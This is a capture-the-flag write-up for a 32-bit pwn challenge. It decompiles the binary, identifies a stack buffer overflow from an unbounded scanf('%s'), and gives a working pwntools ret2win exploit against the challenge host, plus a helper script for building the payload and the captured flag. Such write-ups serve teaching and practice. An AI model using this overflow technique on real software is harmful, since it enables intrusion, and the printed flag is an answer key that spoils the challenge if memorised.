Get The Sword
Challenge Description :

Basic Binary Enumeration :
We can see that the binary is 32-bit and not stripped, which means the function names are not obfuscated, and all the protections are off.

Let's open the binary in Ghidra to analyze it and find potential vulnerabilities.
We have 4 functions:
undefined4 main(void)
{
printSword();
intro();
return 0;
}
void printSword(void)
{
puts(" />_________________________________");
puts("[#####[]_________________________________>");
puts(" \\>");
fflush(stdout);
return;
}
void intro(void)
{
undefined local_20 [24]; // 24-byte stack buffer
printf("What do you want ? ?: ");
fflush(stdout);
__isoc99_scanf("%s", local_20); // BOF vulnerability: %s has no width limit
printf("You want, %s\n", local_20);
return;
}
// win function
void getSword(void)
{
system("cat flag.txt");
fflush(stdout);
return;
}
The function intro is vulnerable because it reads user input into a 24-byte stack buffer without checking the size of the data received.
Offset to EIP :
We can use gdb to find the offset, and we can also use Ghidra.
In Ghidra we can see that the offset needed to reach EIP is 0x20, which is 32 bytes.

Exploit :
from pwn import *
# Set up pwntools for the correct architecture
exe = './get_sword'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# io = process(exe)  # local testing
io = remote('173.255.201.51', 31337)
offset = 32
ret = 0x0804900e  # ret gadget (ropper --file=ret2win --search="ret"); not needed on 32-bit, unused below
payload = flat(
    offset * b'A',       # padding up to the saved EIP
    elf.functions.getSword  # address of the win function
)
io.sendlineafter(b':', payload)
io.interactive()
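As an added example (not part of the original writeup), the following script shows where the offset of 32 comes from (Ghidra names a stack local by its distance below the return-address slot, so local_20 is 0x20 bytes from EIP), builds the same padding-plus-address payload the pwntools script sends, and checks a caveat of this particular bug: scanf("%s") stops at whitespace or NUL, so a return address containing such a byte would be truncated. The win-function address is not on the page, so the checks use the page's ret gadget 0x0804900e and a constructed bad address.

```python
import re
import struct

# Bytes that end a scanf("%s") read: NUL (string terminator) and C isspace() characters.
SCANF_S_TERMINATORS = b"\x00\t\n\x0b\x0c\r "


def offset_from_ghidra_local(name: str) -> int:
    """Ghidra's local_XX is the hex distance below the return-address slot,
    so local_20 lies 0x20 = 32 bytes before the saved EIP."""
    m = re.fullmatch(r"local_([0-9a-fA-F]+)", name)
    if not m:
        raise ValueError(f"not a Ghidra stack local name: {name!r}")
    return int(m.group(1), 16)


def build_payload(offset: int, target: int) -> bytes:
    """Padding up to the saved EIP, then the little-endian 32-bit address to
    return into (what flat() produces in the pwntools script)."""
    return b"A" * offset + struct.pack("<I", target)


def scanf_unsafe_bytes(payload: bytes) -> list:
    """(index, byte) pairs that scanf('%s') would treat as end of input;
    any of them before the address is fully written truncates the overwrite."""
    return [(i, b) for i, b in enumerate(payload) if b in SCANF_S_TERMINATORS]


def analyse(local_name: str, target: int) -> dict:
    """Tie the steps together for one target address."""
    offset = offset_from_ghidra_local(local_name)
    payload = build_payload(offset, target)
    return {
        "offset": offset,
        "payload_len": len(payload),
        "unsafe": scanf_unsafe_bytes(payload),
    }


if __name__ == "__main__":
    # 0x0804900e is the ret gadget from the writeup; 0x0804200a is a constructed
    # address whose bytes 0x0a and 0x20 would stop scanf("%s").
    for addr in (0x0804900E, 0x0804200A):
        print(hex(addr), analyse("local_20", addr))
```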

Flag :
KCTF{so_you_g0t_the_sw0rd}